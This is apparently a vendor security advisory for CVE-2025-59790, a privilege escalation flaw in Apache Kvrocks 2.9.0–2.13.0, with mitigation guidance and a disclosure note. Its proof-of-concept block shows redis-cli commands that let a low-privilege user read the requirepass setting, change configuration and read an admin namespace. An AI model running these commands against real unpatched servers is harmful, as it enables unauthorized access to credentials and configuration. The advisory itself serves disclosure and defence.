← Back to Blog
MediumCVSS 5.4Privilege EscalationCVE-2025-59790

Published 2025

Apache Kvrocks Privilege Escalation

BugBunny.ai discovered a privilege escalation vulnerability in Apache Kvrocks where namespace token validation allowed users to escalate privileges across namespaces, potentially accessing admin-level functionality with limited credentials.

Responsibly DisclosedView CVE →

Summary

Impact:Low-privilege users can execute privileged commands
Vector:Namespace token validation bypass
Affected:Kvrocks 2.9.0 - 2.13.0
Status:Fixed in v2.14.0

Proof of Concept

# Connect as low-privilege user
redis-cli -h kvrocks-host -p 6666 -a low_priv_password

# Despite limited permissions, execute privileged commands
> CONFIG GET requirepass
1) "requirepass"
2) ""

# Or modify configuration that should be admin-only
> CONFIG SET maxclients 100
OK

# In vulnerable versions (2.9.0-2.13.0), namespace token
# validation allowed privilege escalation across namespaces
> NAMESPACE GET admin_namespace
# Returns data from admin namespace despite lacking permission

# Fixed in v2.14.0: Proper privilege checks now enforced

Mitigation

Upgrade to Apache Kvrocks v2.14.0 or later. The fix implements proper privilege checks for all commands.

Credits & Disclosure

Identified by BugBunny.ai and responsibly disclosed to the Apache Kvrocks maintainers.

Reporter: BugBunny.aiCVE-2025-59790
CVE-2025-59790: Apache Kvrocks Privilege Escalation | BugBunny.ai | BugBunny.ai